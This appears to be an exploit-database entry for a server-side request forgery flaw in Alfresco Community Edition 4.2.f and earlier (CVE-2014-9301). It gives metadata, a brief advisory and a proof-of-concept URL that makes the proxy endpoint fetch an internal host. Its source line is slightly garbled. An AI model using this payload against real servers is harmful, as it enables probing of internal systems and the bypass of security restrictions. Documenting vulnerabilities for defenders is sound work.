Alfresco - '/proxy?endpoint' Server-Side Request Forgery

Author: V. Paulikas
type: remote
platform: multiple
port: 
date_added: 2014-07-16 
date_updated: 2016-11-17 
verified: 1 
codes: CVE-2014-9301;OSVDB-109197 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/68/info

http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info

Alfresco Community Edition is prone to multiple security vulnerabilities.

An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.

Alfresco Community Edition 4.2.f and earlier are vulnerable.

http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port